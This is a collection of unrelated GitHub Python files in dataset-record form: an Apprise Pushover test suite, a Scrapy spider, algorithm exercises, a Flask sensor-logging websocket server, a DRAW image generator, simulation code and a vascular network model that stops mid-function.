apprise.AppriseAttachment.instantiate(str(image))\n    assert obj.notify(body=\"test\", attach=attach) is True\n\n    # Test our call count\n    assert mock_post.call_count == 1\n    assert mock_post.call_args_list[0][0][0] == \\\n        'https://api.pushover.net/1/messages.json'\n\n    # Reset our mock object for multiple tests\n    mock_post.reset_mock()\n\n    # Add 1 more byte to the file (putting it over the limit)\n    image.write(\n        'a' * (NotifyPushover.attach_max_size_bytes + 1))\n\n    attach = apprise.AppriseAttachment.instantiate(str(image))\n    assert obj.notify(body=\"test\", attach=attach) is False\n\n    # Test our call count\n    assert mock_post.call_count == 0\n\n    # Test case when file is missing\n    attach = apprise.AppriseAttachment.instantiate(\n        'file://{}?cache=False'.format(str(image)))\n    os.unlink(str(image))\n    assert obj.notify(\n        body='body', title='title', attach=attach) is False\n\n    # Test our call count\n    assert mock_post.call_count == 0\n\n    # Test unsupported files:\n    image = tmpdir.mkdir(\"pover_unsupported\").join(\"test.doc\")\n    image.write('a' * 256)\n    attach = apprise.AppriseAttachment.instantiate(str(image))\n
\n    # Content is silently ignored\n    assert obj.notify(body=\"test\", attach=attach) is True\n\n    # prepare our attachment\n    attach = apprise.AppriseAttachment(\n        os.path.join(TEST_VAR_DIR, 'apprise-test.gif'))\n\n    # Throw an exception on the first call to requests.post()\n    for side_effect in (requests.RequestException(), OSError(), bad_response):\n        mock_post.side_effect = [side_effect, side_effect]\n\n        # We'll fail now because of our error handling\n        assert obj.send(body=\"test\", attach=attach) is False\n\n        # Same case without an attachment\n        assert obj.send(body=\"test\") is False\n\n\n@mock.patch('requests.post')\ndef test_plugin_pushover_edge_cases(mock_post):\n    \"\"\"\n    NotifyPushover() Edge Cases\n\n    \"\"\"\n\n    # No token\n    with pytest.raises(TypeError):\n        NotifyPushover(token=None)\n\n    # Initialize some generic (but valid) tokens\n    token = 'a' * 30\n    user_key = 'u' * 30\n\n    invalid_device = 'd' * 35\n\n    # Support strings\n    devices = 'device1,device2,,,,%s' % invalid_device\n\n    # Prepare Mock\n    mock_post.return_value = requests.Request()\n    mock_post.return_value.status_code = requests.codes.ok\n\n    # No token specified (the stray webhook_id argument is simply unsupported)\n    with pytest.raises(TypeError):\n        NotifyPushover(user_key=user_key, webhook_id=None)\n\n    obj = NotifyPushover(\n        user_key=user_key, token=token, targets=devices)\n    assert isinstance(obj, NotifyPushover) is True\n    # Our invalid device is ignored\n    assert len(obj.targets) == 2\n\n    # We notify the 2 devices loaded\n    assert obj.notify(\n        body='body', title='title',\n        notify_type=apprise.NotifyType.INFO) is True\n\n    obj = NotifyPushover(user_key=user_key, token=token)\n    assert isinstance(obj, NotifyPushover) is True\n    # Default is to send to all devices, so there will be a\n    # device defined here\n    assert len(obj.targets) == 1\n\n    # This call succeeds because all of the devices are valid\n    assert obj.notify(\n        body='body', title='title',\n        notify_type=apprise.NotifyType.INFO) is True\n\n    obj = NotifyPushover(\n        user_key=user_key, token=token, targets=set())\n    assert isinstance(obj, NotifyPushover) is True\n    # Default is to send to all devices, so there will be a\n    # device defined here\n    assert len(obj.targets) == 1\n\n    # No User Key specified\n    with pytest.raises(TypeError):\n        NotifyPushover(user_key=None, token=\"abcd\")\n\n    # No Access Token specified\n    with pytest.raises(TypeError):\n        NotifyPushover(user_key=\"abcd\", token=None)\n\n    with pytest.raises(TypeError):\n        NotifyPushover(user_key=\"abcd\", token=\" \")\n\n
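\n# --- Illustrative aside (added; not part of the original test module) ---\n# The config-file test below exercises Apprise's priority coercion: the\n# integer -2, the string \"-2\" and the name \"low\" must all map to the same\n# PushoverPriority enum.  A minimal stand-alone use of the plugin looks\n# like this (tokens are dummies):\n#\n#   import apprise\n#   a = apprise.Apprise()\n#   a.add('pover://%s@%s?priority=low' % ('u' * 30, 'a' * 30))\n#   a.notify(title='title', body='body')  # False here: the dummy tokens fail\n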
\n@mock.patch('requests.post')\ndef test_plugin_pushover_config_files(mock_post):\n    \"\"\"\n    NotifyPushover() Config File Cases\n    \"\"\"\n    content = \"\"\"\n    urls:\n      - pover://USER@TOKEN:\n          - priority: -2\n            tag: pushover_int low\n          - priority: \"-2\"\n            tag: pushover_str_int low\n          - priority: low\n            tag: pushover_str low\n\n          # This will take on normal (default) priority\n          - priority: invalid\n            tag: pushover_invalid\n\n      - pover://USER2@TOKEN2:\n          - priority: 2\n            tag: pushover_int emerg\n          - priority: \"2\"\n            tag: pushover_str_int emerg\n          - priority: emergency\n            tag: pushover_str emerg\n    \"\"\"\n\n    # Prepare Mock\n    mock_post.return_value = requests.Request()\n    mock_post.return_value.status_code = requests.codes.ok\n\n    # Create ourselves a config object\n    ac = apprise.AppriseConfig()\n    assert ac.add_config(content=content) is True\n\n    aobj = apprise.Apprise()\n\n    # Add our configuration\n    aobj.add(ac)\n\n    # We should be able to read our 7 servers from that\n    # 3x low\n    # 3x emerg\n    # 1x invalid (so takes on normal priority)\n    assert len(ac.servers()) == 7\n    assert len(aobj) == 7\n    assert len([x for x in aobj.find(tag='low')]) == 3\n    for s in aobj.find(tag='low'):\n        assert s.priority == PushoverPriority.LOW\n\n    assert len([x for x in aobj.find(tag='emerg')]) == 3\n    for s in aobj.find(tag='emerg'):\n        assert s.priority == PushoverPriority.EMERGENCY\n\n    assert len([x for x in aobj.find(tag='pushover_str')]) == 2\n    assert len([x for x in aobj.find(tag='pushover_str_int')]) == 2\n    assert len([x for x in aobj.find(tag='pushover_int')]) == 2\n\n    assert len([x for x in aobj.find(tag='pushover_invalid')]) == 1\n    assert next(aobj.find(tag='pushover_invalid')).priority == \\\n        PushoverPriority.NORMAL\n\n    # Notifications work\n    # We test 'pushover_str_int' and 'low' which only matches 1 end point\n    assert aobj.notify(\n        title=\"title\", body=\"body\", tag=[('pushover_str_int', 'low')]) is True\n\n    # Notify everything loaded\n    assert aobj.notify(title=\"title\", body=\"body\") is True\n","repo_name":"caronc/apprise","sub_path":"test/test_plugin_pushover.py","file_name":"test_plugin_pushover.py","file_ext":"py","file_size_in_byte":13967,"program_lang":"python","lang":"en","doc_type":"code","stars":8936,"dataset":"github-code","pt":"21"}
{"seq_id":"24575270032","text":"import scrapy\nfrom modulnakr.items import ModulnakrItem\nfrom bs4 import BeautifulSoup\nfrom selenium import webdriver\nfrom selenium.webdriver.support import expected_conditions\nfrom selenium.webdriver.common.by import By\nfrom modulnakr.SeleniumRequest import SeleniumRequest\n\nclass EkSpider(scrapy.Spider):\n    name = \"ek\"\n    allowed_domains = [\"ek.ua\"]\n    start_urls = [\"https://ek.ua/ua/list/30/\"]\n\n    driver = webdriver.Chrome('/path/to/chromedriver')\n\n    def start_requests(self):\n        for url in self.start_urls:\n            yield SeleniumRequest(\n                url=url,\n                callback=self.parse,\n                wait_time=10,\n                wait_until=expected_conditions.element_to_be_clickable(\n                    (By.CSS_SELECTOR,\n                     \".model-shop-name .sn-div\")\n                ),\n            )\n\n    def parse(self, response):\n        self.driver.get(response.url)\n        self.driver.maximize_window()\n\n        soup = BeautifulSoup(response.text, 'html.parser')\n\n        laptops = soup.find(id=\"list_form1\").find_all(class_=\"model-short-div list-item--goods\")\n\n        for laptop in laptops:\n            model = laptop.find(class_=\"u\").getText()\n            img_url = laptop.find(\"img\")[\"src\"]\n\n            price = laptop.find('td', class_=\"model-shop-price\").find(\"a\").getText()\n\n            print(price)\n            \n\n            configs = laptop.find(class_=\"model-short-info\").findAll(\"u\")\n\n            i = 1\n            for config in configs:\n                config = config.getText()\n                yield ModulnakrItem(\n                    model=model,\n                    img_url=img_url,\n                    price=price,\n                    config=config,\n                )\n\n                i += 1\n                if i > 7:\n                    break\n\n    def close(self, reason):\n        self.driver.quit()\n","repo_name":"Heesemachine/Scrapping","sub_path":"modulnakr/modulnakr/spiders/ek.py","file_name":"ek.py","file_ext":"py","file_size_in_byte":1865,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
{"seq_id":"45072526821","text":"N, K = input().split()\nN = int(N)\nK = float(K)\nfence = []\n\ntry:\n    while len(fence) < N:\n        fence += [float(a) for a in input().split()]\nexcept EOFError:\n    pass\n\nfence.sort()\n\nfirst = 0\nnext = 1\nmax_num = 0\nlength = 1\n\n# two-pointer sweep over the sorted posts: 'next' never moves backwards,\n# so each post is compared only once\nwhile first < N:\n    while next < N:  # fixed: the bound 'N - first' wrongly shrank the window as 'first' grew\n        if fence[next] - fence[first] <= K:\n            length += 1\n            next += 1\n        else:\n            break\n\n    if length > max_num:\n        max_num = length\n\n    length -= 1\n    first += 1
\n\nprint(max_num)\n","repo_name":"Loosper/algorithms","sub_path":"lesson_1/fence.py","file_name":"fence.py","file_ext":"py","file_size_in_byte":588,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
{"seq_id":"1147288081","text":"n = int(input())\nvalues = list(map(int,input().split()))\nop = list(map(int,input().split()))\nmax_val = -1e9\nmin_val = 1e9\n\ndef dfs(depth, result, plus, minus, multiply, divide):\n    global max_val, min_val\n    if depth == n:\n        max_val = max(result, max_val)\n        min_val = min(result, min_val)\n        return \n    if plus:\n        dfs(depth+1, result+values[depth], plus-1, minus, multiply, divide)\n    if minus:\n        dfs(depth+1, result-values[depth], plus, minus-1, multiply, divide)\n    if multiply:\n        dfs(depth+1, result*values[depth], plus, minus, multiply-1, divide)\n    if divide:\n        if result < 0:  # if the running result is negative, emulate truncation toward zero\n            dfs(depth+1, -(-(result)//values[depth]), plus, minus, multiply, divide-1)\n        else:\n            dfs(depth+1, result//values[depth], plus, minus, multiply, divide-1)\n\ndfs(1, values[0], op[0], op[1], op[2], op[3])\nprint(max_val)\nprint(min_val)","repo_name":"julia0926/TIL_Algo","sub_path":"Study/Backjoon/백트래킹/14888.py","file_name":"14888.py","file_ext":"py","file_size_in_byte":902,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
{"seq_id":"11439125862","text":"import os\nimport datetime\n\nfrom server import db, app\n\n\nclass Table(db.Model):\n    __table_args__ = (db.UniqueConstraint('name_id', 'ver'), )\n    id = db.Column(db.Integer, autoincrement=True, primary_key=True)\n    name_id = db.Column(db.Integer, db.ForeignKey('table_name.id'), nullable=False)\n    ver = db.Column(db.Integer, nullable=False, default=1)\n    time = db.Column(db.DateTime, default=datetime.datetime.utcnow)\n    id_col = db.Column(db.String(10), default='id')\n    y_col = db.Column(db.String(10))\n    y_col_id = db.Column(db.Integer, default=-1)\n    memo = db.Column(db.String(320), default='')\n    price0 = db.Column(db.Numeric(10, 2), default=.01)\n    price1 = db.Column(db.Numeric(10, 2), default=.01)\n    price2 = db.Column(db.Numeric(10, 2), default=.01)\n    score = db.Column(db.Float)\n    # name backref from TableName\n\n    def get_fate_path(self):\n        return 't%d_v%d' % (self.name_id, self.ver)\n\n    def get_local_path(self):\n        path = 'u%d_t%d_v%d' % (self.name.uid, self.name_id, self.ver)\n        return os.path.join(app.config['UPLOAD_FOLDER'], path)\n","repo_name":"cleanerleon/FDP_SERVER","sub_path":"server/model/Table.py","file_name":"Table.py","file_ext":"py","file_size_in_byte":1087,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
{"seq_id":"38054919297","text":"# -*- coding: utf-8 -*-\nfrom abc import ABCMeta, abstractmethod\nimport os\nimport re\n\n\nclass GraphFactory(object):\n    def __init__(self, graphInfo):\n        self.graphInfo = graphInfo\n\n    def analysisGraphPath(self):\n        # if isinstance(list, self.graphInfo):\n        #     graphAly = GraphListAly()\n        # elif\n        if os.path.isfile(self.graphInfo):\n            graphAly = GraphPathAly(self.graphInfo)\n        elif isinstance(self.graphInfo, str):\n            graphAly = GraphStrAly(self.graphInfo)\n        else:\n            graphAly = None\n        return graphAly\n\n\nclass GraphAnalysis(object):\n    __metaclass__ = ABCMeta\n\n    def __init__(self):\n        self.graphInfo = None\n        pass\n\n    @abstractmethod\n    def alyGraphInput(self):\n        pass\n\n    @staticmethod\n    def getRouteList(line):\n        # return [(graphName, routes)]\n        # parse one input line of route statements\n        graphs = []\n        for graph in line.split(';'):\n            if graph.strip() == '':\n                continue\n            try:\n                name, routes = graph.split(':')
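\n                # --- Illustrative aside (added; not part of the original module) ---\n                # Example of the format handled here (route tokens follow the usual\n                # Trains-kata style): \"g1:AB5,BC4;g2:CD8\" yields\n                # [('g1', 'AB5,BC4'), ('g2', 'CD8')]; a segment without a colon\n                # falls back to (None, routes) via the except branch below.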
routes = graph.split(':')\n except:\n routes = graph\n name = None\n graphs.append((name, routes))\n return graphs\n\n\nclass GraphStrAly(GraphAnalysis):\n def __init__(self, graphInfo):\n self.graphInfo = graphInfo\n self.graphList = []\n\n def alyGraphInput(self):\n # 解析地图\n # for graph in self.graphInfo.split(';'):\n # name, routes = graph.split(':')\n # self.graphList.append((name, routes))\n # return self.graphList\n return self.getRouteList(self.graphInfo)\n\nclass GraphListAly(GraphAnalysis):\n def __init__(self, graphInfo):\n self.graphInfo = graphInfo\n self.graphList = []\n\n def alyGraphInput(self):\n return self.graphList\n\n\nclass GraphPathAly(GraphAnalysis):\n def __init__(self, graphInfo):\n self.graphInfo = graphInfo\n self.graphList = []\n\n def alyGraphInput(self):\n with open(self.graphInfo) as f:\n for line in f:\n # 解析地图\n self.graphList.extend(self.getRouteList(line))\n\n return self.graphList\n","repo_name":"Gwen106728/Trains","sub_path":"src/GraphInfoAly.py","file_name":"GraphInfoAly.py","file_ext":"py","file_size_in_byte":2186,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"15570901302","text":"def split_var_lead(dat):\n \"\"\"\n Data split into lead times and variables for all X values data, excludes first lead_time as it is aquivalent to forecast_date\nArgs:\n dat(list): list of all 6 variables and their data including predictions and truth\n \n \nReturns: \n list: Nested list of lenght 6x31 with X values for all 6 variables and all 31 lead_times\n list: Nested list of lenght 6x31 with y values for all 6 variables and all 31 lead_times\n \"\"\"\n var_names = [\"u10\", \"v10\", \"t2m\", \"t850\", \"z500\", \"ws10\"]\n dat_X_lead_u10 = [] # list(31) of u10 with different lead times\n dat_X_lead_v10 = []\n dat_X_lead_t2m = []\n dat_X_lead_t850 = []\n dat_X_lead_z500 = []\n dat_X_lead_ws10 = []\n dat_X_lead_all = [\n dat_X_lead_u10,\n dat_X_lead_v10,\n dat_X_lead_t2m,\n dat_X_lead_t850,\n dat_X_lead_z500,\n dat_X_lead_ws10\n ] # List of all 5 X - variables and their lead times\n dat_y_lead_u10 = [] # list(31) of u10 ground truth values with different lead_times\n dat_y_lead_v10 = []\n dat_y_lead_t2m = []\n dat_y_lead_t850 = []\n dat_y_lead_z500 = []\n dat_y_lead_ws10 = []\n dat_y_lead_all = [\n dat_y_lead_u10,\n dat_y_lead_v10,\n dat_y_lead_t2m,\n dat_y_lead_t850,\n dat_y_lead_z500,\n dat_y_lead_ws10\n ]\n for lead in range(1, 32):\n for var in range(6):\n dat_X_lead_all[var].append(\n dat[var][list(dat[var].data_vars.keys())[0]].isel(lead_time=lead)\n )\n dat_y_lead_all[var].append(\n dat[var][list(dat[var].data_vars.keys())[1]].isel(lead_time=lead)\n )\n return dat_X_lead_all, dat_y_lead_all\n\n\ndef split_var_lead_one(dat):\n \"\"\"\n Return 31 datasets one for each relevant lead_time\n \"\"\"\n dat_split_X = []\n dat_split_y = []\n for lead_time in range(1, 32):\n dat_split_X.append(dat[list(dat.data_vars.keys())[0]].isel(lead_time=lead_time))\n dat_split_y.append(dat[list(dat.data_vars.keys())[1]].isel(lead_time=lead_time))\n return dat_split_X, dat_split_y","repo_name":"cleveryangcong/Bachelor_Thesis","sub_path":"src/utils/data_split.py","file_name":"data_split.py","file_ext":"py","file_size_in_byte":2102,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"6825652038","text":"from snek5000.info import InfoSolverMake\nfrom snek5000.solvers.kth import SimulKTH\n\n\nclass InfoSolverPhill(InfoSolverMake):\n \"\"\"Contain the information on a 
:class:`eturb.solvers.abl.Simul`\n instance.\n\n .. todo::\n\n Move Output info to :class:`InfoSolverNek` and only override it in\n :class:`InfoSolverABL`.\n\n \"\"\"\n\n def _init_root(self):\n from . import short_name\n\n super()._init_root()\n self.module_name = \"phill.solver\"\n self.class_name = \"Simul\"\n self.short_name = short_name\n\n self.classes.Output.module_name = \"phill.output\"\n self.classes.Output.class_name = \"OutputPhill\"\n\n\nclass SimulPhill(SimulKTH):\n \"\"\"A solver which compiles and runs using a Snakefile.\"\"\"\n\n InfoSolver = InfoSolverPhill\n\n @classmethod\n def create_default_params(cls):\n \"\"\"Set default values of parameters as given in reference\n implementation.\n\n \"\"\"\n params = super().create_default_params()\n\n params.nek.velocity._set_attrib(\"advection\", True)\n\n # Set par file parameters\n # ------------------------\n # Alternative can be to add phill.par to the current directory and\n # Synchronize baseline parameters as follows:\n # -----------------------------------------------------------------\n # primary_par_file = get_root() / \"phill.par\"\n # if mpi.rank == 0:\n # logger.info(f\"Reading baseline parameters from {primary_par_file}\")\n #\n # params.nek._read_par(primary_par_file)\n\n # https://github.com/KTH-Nek5000/KTH_Examples/blob/master/phill_STAT/phill.par\n general = params.nek.general\n general.stop_at = \"num_steps\"\n general.num_steps = 20\n general.dt = -2e-4\n general.time_stepper = \"bdf3\"\n general.variable_dt = False\n general.target_cfl = 0.3\n general.write_control = \"timestep\"\n general.write_interval = 100\n general.dealiasing = True\n general.filtering = \"explicit\"\n general.filter_weight = 0.02\n general.filter_cutoff_ratio = 0.67\n\n params.nek.problemtype.stress_formulation = False\n params.nek.problemtype.variable_properties = False\n\n params.nek.pressure.residual_tol = params.nek.velocity.residual_tol = 1e-8\n params.nek.pressure.residual_proj = params.nek.velocity.residual_proj = 1e-8\n params.nek.velocity.density = 1.0\n params.nek.velocity.viscosity = -700\n\n # User parameters for KTH framework\n params.nek.stat.av_step = 10\n params.nek.stat.io_step = 50\n\n # Set box file parameters\n # -----------------------\n # https://github.com/KTH-Nek5000/KTH_Examples/blob/master/phill_STAT/phill.box\n oper = params.oper\n # logger.info(oper._doc)\n\n oper.dim = 3\n oper.scalars = 1\n oper.nx = 22\n oper.ny = 16\n oper.nz = 19\n\n oper.Lx = oper.Ly = oper.Lz = 1.0\n oper.boundary = [\"P\", \"P\", \"W\", \"W\", \"P\", \"P\"]\n\n # Set SIZE file parameters\n # ------------------------\n # https://github.com/KTH-Nek5000/KTH_Examples/blob/master/phill_STAT/SIZE\n # Basic\n # logger.info(oper.elem._doc)\n # logger.info(oper.max._doc)\n # logger.info(oper.misc._doc)\n\n oper.elem.order = 6 # lx1\n oper.elem.coef_dealiasing = 2 / 3 # lxd\n oper.elem.staggered = True # Pn Pn-2\n\n # lelg calculated automatically\n oper.nproc_min = 8 # lpmin\n oper.nproc_max = 32 # lpmax\n\n oper.misc.fast_diag = False\n return params\n\n\nSimul = SimulPhill\n","repo_name":"snek5000/snek5000-phill","sub_path":"src/phill/solver.py","file_name":"solver.py","file_ext":"py","file_size_in_byte":3637,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"42051675656","text":"import os, sys, fnmatch\n\nignore = ['processing.js']\ndef get_js_files(path):\n js = []\n for path, dirs, files in os.walk(path):\n for file in files:\n if not file in ignore and 
fnmatch.fnmatch(file.lower(), r'*.js'):\n js.append(os.path.join(path, file))\n return js\n\ntarget = r'*PACK-HERE*'\ndef get_main_file(js_files):\n for dot_js in js_files:\n FILE = open(dot_js, 'r')\n for line in FILE.readlines():\n if fnmatch.fnmatch(line, target):\n return dot_js\n FILE.close()\n\ndef build(main, files, output):\n IN = open(main, 'r')\n OUT = open(output, 'w')\n\n for in_line in IN.readlines():\n if fnmatch.fnmatch(in_line, target):\n for file in files:\n FILE = open(file, 'r')\n for line in FILE.readlines():\n OUT.write(line)\n FILE.close()\n else:\n OUT.write(in_line)\n\n OUT.close()\n IN.close()\n \nif __name__ == '__main__':\n files= get_js_files(sys.path[0])\n \n main= get_main_file(files)\n files = [x for x in files if x != main]\n\n outfile = os.path.join(sys.path[0],'build','AIScript.js')\n \n build(main, files, outfile)\n","repo_name":"joshbyrom/AIScript","sub_path":"build.py","file_name":"build.py","file_ext":"py","file_size_in_byte":1235,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"4889944354","text":"import argparse\n\nimport torch\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport matplotlib.animation as animation\nimport torchvision.utils as vutils\nimport time\n\nfrom draw_model import DRAWModel\n\nparser = argparse.ArgumentParser()\nparser.add_argument('-load_path', required=True, help='Checkpoint to load path from')\nparser.add_argument('-num_output', default=36, help='Number of generated outputs')\nparser.add_argument('-t', default=None, help='Number of glimpses.')\nargs = parser.parse_args()\n\n# Load the checkpoint file.\nstate_dict = torch.load(args.load_path)\n\n# Set the device to run on: GPU or CPU.\ndevice = torch.device(\"cuda:0\" if(torch.cuda.is_available()) else \"cpu\")\n# Get the 'params' dictionary from the loaded state_dict.\nparams = state_dict['params']\n\n# Set the number of glimpses.\n# Best to just use the same value which was used for training.\nparams['T'] = int(args.t) if(args.t) else params['T']\n\n# Load the model\nmodel = DRAWModel(params).to(device)\n# Load the trained parameters.\nmodel.load_state_dict(state_dict['model'])\nprint('\\n')\nprint(model)\n\nstart_time = time.time()\nprint('*'*25)\nprint(\"Generating Image...\")\n# Generate images.\nwith torch.no_grad():\n x = model.generate(int(args.num_output))\n\ntime_elapsed = time.time() - start_time\nprint('\\nDONE!')\nprint('Time taken to generate image: %.2fs' % (time_elapsed))\n\nprint('\\nSaving generated image...')\nfig = plt.figure(figsize=(int(np.sqrt(int(args.num_output)))*2, int(np.sqrt(int(args.num_output)))*2))\nplt.axis(\"off\")\nplt.imshow(np.transpose(vutils.make_grid(\n x[-1], nrow=int(np.sqrt(int(args.num_output))), padding=1, normalize=True, pad_value=1).cpu(), (1, 2, 0)))\nplt.savefig(\"Generated_Image\")\nplt.close('all')\n\n# Create animation for the generation.\nfig = plt.figure(figsize=(int(np.sqrt(int(args.num_output)))*2, int(np.sqrt(int(args.num_output)))*2))\nplt.axis(\"off\")\nims = [[plt.imshow(np.transpose(i,(1,2,0)), animated=True)] for i in x]\nanim = animation.ArtistAnimation(fig, ims, interval=200, repeat_delay=2000, blit=True)\nanim.save('draw_generate.gif', dpi=100, 
writer='imagemagick')\nprint('DONE!')\nprint('-'*50)\nplt.show()","repo_name":"Natsu6767/Generating-Devanagari-Using-DRAW","sub_path":"generate.py","file_name":"generate.py","file_ext":"py","file_size_in_byte":2128,"program_lang":"python","lang":"en","doc_type":"code","stars":88,"dataset":"github-code","pt":"21"} +{"seq_id":"19433641689","text":"from flask import Flask \nfrom flask_sockets import Sockets\nimport sys\nimport os\n\napp = Flask(__name__) \nsockets = Sockets(app)\nif sys.argv[1]:\n\tDIR = \"./data/\" + sys.argv[1] + \"/\"\n\tif not os.path.exists(DIR):\n\t\tos.mkdir(DIR)\nelse:\n\tDIR = \"\"\n\n\n@sockets.route('/accelerometer') \ndef echo_socket(ws):\n\tf=open(DIR+\"accelerometer.txt\",\"a\")\n\twhile True: \n\t\tmessage = ws.receive()\n\t\t# print(message) \n\t\tws.send(message)\n\t\tprint(message, file=f)\n\tf.close()\n\n\n@sockets.route('/gyroscope')\ndef echo_socket(ws):\n\tf=open(DIR+\"gyroscope.txt\",\"a\")\n\twhile True:\n\t\tmessage = ws.receive()\n\t\t# print(message)\n\t\tws.send(message)\n\t\tprint(message, file=f)\n\tf.close()\n\t\n@sockets.route('/magnetometer')\ndef echo_socket(ws):\n\tf=open(DIR+\"magnetometer.txt\",\"a\")\n\twhile True:\n\t\tmessage = ws.receive()\n\t\t# print(message)\n\t\tws.send(message)\n\t\tprint(message, file=f)\n\tf.close()\n\n@sockets.route('/orientation')\ndef echo_socket(ws):\n\tf=open(DIR+\"orientation.txt\",\"a\")\n\twhile True:\n\t\tmessage = ws.receive()\n\t\t# print(message)\n\t\tws.send(message)\n\t\tprint(message, file=f)\n\tf.close()\n\n@sockets.route('/stepcounter')\ndef echo_socket(ws):\n\tf=open(DIR+\"stepcounter.txt\",\"a\")\n\twhile True:\n\t\tmessage = ws.receive()\n\t\t# print(message)\n\t\tws.send(message)\n\t\tprint(message, file=f)\n\tf.close()\n\n@sockets.route('/thermometer')\ndef echo_socket(ws):\n\tf=open(DIR+\"thermometer.txt\",\"a\")\n\twhile True:\n\t\tmessage = ws.receive()\n\t\t# print(message)\n\t\tws.send(message)\n\t\tprint(message, file=f)\n\tf.close()\n\n@sockets.route('/lightsensor')\ndef echo_socket(ws):\n\tf=open(DIR+\"lightsensor.txt\",\"a\")\n\twhile True:\n\t\tmessage = ws.receive()\n\t\t# print(message)\n\t\tws.send(message)\n\t\tprint(message, file=f)\n\tf.close()\n\n@sockets.route('/proximity')\ndef echo_socket(ws):\n\tf=open(DIR+\"proximity.txt\",\"a\")\n\twhile True:\n\t\tmessage = ws.receive()\n\t\t# print(message)\n\t\tws.send(message)\n\t\tprint(message, file=f)\n\tf.close()\n\n@sockets.route('/geolocation')\ndef echo_socket(ws):\n\tf=open(DIR+\"geolocation.txt\",\"a\")\n\twhile True:\n\t\tmessage = ws.receive()\n\t\t# print(message)\n\t\tws.send(message)\n\t\tprint(message, file=f)\n\tf.close()\n\n\t\n\n@app.route('/') \ndef hello(): \n\treturn 'Hello World!'\n\nif __name__ == \"__main__\":\n\tfrom gevent import pywsgi\n\tfrom geventwebsocket.handler import WebSocketHandler\n\tserver = pywsgi.WSGIServer(('0.0.0.0', 5000), app, handler_class=WebSocketHandler)\n\tserver.serve_forever()\n","repo_name":"DedZago/msbd","sub_path":"PhonePi/PhonePiPython3.py","file_name":"PhonePiPython3.py","file_ext":"py","file_size_in_byte":2320,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"13447310481","text":"#!/usr/bin/env python\r\n# -*- coding: utf-8 -*-\r\n\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nimport networkx as nx\r\nimport scipy.sparse as spr\r\nimport scipy.sparse.linalg as sprlin\r\nimport triangular_net as Tr\r\nimport draw_net as Dr\r\nimport delaunay as De\r\nfrom collections import defaultdict\r\nfrom geometry 
import set_geometry\r\nimport time\r\n\r\n#================= WARUNKI POCZĄTKOWE i STAŁE ========================================================================\r\n\r\nn = 401 # rozmiar siatki\r\nnkw=n**2\r\n\r\nlength_wiggle_param = 1\r\ndiameter_wiggle_param = 3\r\n\r\nSPARSE = 1 # 1 = twórz macierz rzadką, 0 = twórz zwykłą macierz\r\n\r\nqin = 10 # ilosć wpływającej krwi\r\npresout = 0 # cisnienie na wyjsciu\r\nmu = 0.0035 # współczynnik lepkosci\r\nl = 1 # początkowa długosć krawędzi\r\nc1 = np.pi / (128 * mu) # stała przepływu\r\nc2 = 64 * mu / (np.pi) # stała siły\r\n\r\nF0=0.2\r\nF1=1\r\nz0=0\r\nz1=1\r\nF_mult = 10000\r\ndt = 0.8\r\n\r\niters = 301 # liczba iteracji\r\ndivide = 10\r\n\r\n#================= FUNKCJE WSPÓLNE DLA KAŻDEJ GEOMETRII ==============================================================\r\n\r\ndef create_matrix(G, SPARSE=0):\r\n\r\n data, row, col = [], [], []\r\n\r\n diag = np.zeros(n * n)\r\n for n1, n2, d, l in reg_reg_edges:\r\n res = c1 * d ** 4 / l\r\n data.append(res)\r\n row.append(n1)\r\n col.append(n2)\r\n data.append(res)\r\n row.append(n2)\r\n col.append(n1)\r\n diag[n1] -= res\r\n diag[n2] -= res\r\n for n1, n2, d, l in reg_something_edges:\r\n res = c1 * d ** 4 / l\r\n data.append(res)\r\n row.append(n1)\r\n col.append(n2)\r\n diag[n1] -= res\r\n\r\n for node, datum in enumerate(diag):\r\n if datum != 0:\r\n row.append(node)\r\n col.append(node)\r\n data.append(datum)\r\n\r\n for node in out_nodes:\r\n row.append(node)\r\n col.append(node)\r\n data.append(1)\r\n\r\n insert = defaultdict(float)\r\n for n1, n2, d, l in in_edges:\r\n insert[n2] += c1 * d**4 / l\r\n\r\n sum_insert = sum(insert.values())\r\n\r\n for node in in_nodes:\r\n data.append(-sum_insert)\r\n row.append(node)\r\n col.append(node)\r\n\r\n for ins_node, ins in insert.items():\r\n data.append(ins)\r\n row.append(node)\r\n col.append(ins_node)\r\n\r\n # posortujmy teraz dane tak, aby były najpierw po row, potem po column\r\n #to_sort = list(zip(data, row, col))\r\n #to_sort = sorted(to_sort, key=lambda elem: elem[1] * nkw + elem[2])\r\n #data, row, col = zip(*to_sort)\r\n\r\n return spr.csr_matrix((data, (row, col)), shape=(n * n, n * n))\r\n\r\n\r\ndef solve_equation_for_pressure(matrix, presult):\r\n \"\"\"\r\n Zamieniamy macierz w równaniu na formę macierzy rzadkiej\r\n w celu usprawnienia obliczeń\r\n \"\"\"\r\n if (SPARSE == 0): pnow = sprlin.spsolve(spr.csc_matrix(matrix), presult)\r\n elif (SPARSE == 1): pnow = sprlin.spsolve(matrix, presult)\r\n\r\n return pnow\r\n\r\ndef update_graph(pnow, reg_reg_edges, reg_something_edges, in_edges):\r\n def d_update(F):\r\n #zmiana średnicy pod względem siły F\r\n result = 0\r\n if (F > F0):\r\n if (F < F1):\r\n result = z0+(F-F0)*(z1-z0)/(F1-F0)\r\n else:\r\n result = z1\r\n else:\r\n result = z0\r\n return result * dt\r\n\r\n\r\n reg_reg_edges2, reg_something_edges2, in_edges2=[], [], []\r\n for n1, n2, d, l in reg_reg_edges:\r\n F=F_mult*c1 * c2 * d * np.abs(pnow[n1] - pnow[n2]) / l\r\n dnew=d+d_update(F)\r\n reg_reg_edges2.append((n1, n2, dnew, l))\r\n\r\n for n1, n2, d, l in reg_something_edges:\r\n 